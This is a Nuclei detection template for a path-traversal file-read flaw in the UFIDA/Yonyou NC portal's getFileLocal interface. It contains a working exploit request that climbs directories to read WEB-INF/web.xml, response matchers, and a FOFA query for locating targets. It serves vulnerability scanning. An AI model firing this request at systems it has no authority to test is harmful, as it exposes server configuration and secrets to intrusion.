nuclei-templates/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml

34 lines
1.2 KiB
YAML
Raw Normal View History

2024-02-20 04:13:38 +00:00
id: yonyou-ufida-nc-lfi
info:
name: UFIDA NC Portal - Arbitrary File Read
author: DhiyaneshDk
severity: high
description: |
There is any file reading in the getFileLocal interface of UFIDA Mobile System Management.
reference:
- https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8B%E7%A7%BB%E5%8A%A8%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86getFileLocal%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.md
metadata:
verified: true
max-request: 1
fofa-query: app="用友-移动系统管理"
tags: yonyou,ufida,lfi
http:
- method: GET
path:
- "{{BaseURL}}/portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml"
2024-02-20 04:16:10 +00:00
2024-02-20 04:13:38 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "nc.bs.framework.server.WebApplicationStartupHook"
- "<web-app"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100c3a2a882cbb2f8cc83f6a51534bca511ca636c21a6a1b9a3c9ea856d3decadb9022100e0b7a63f900e860e664e03c6f3a43dfceaecd5ab4c7b7aeb5b920d9dc27369ef:922c64590222798bb761d5b6d8e72950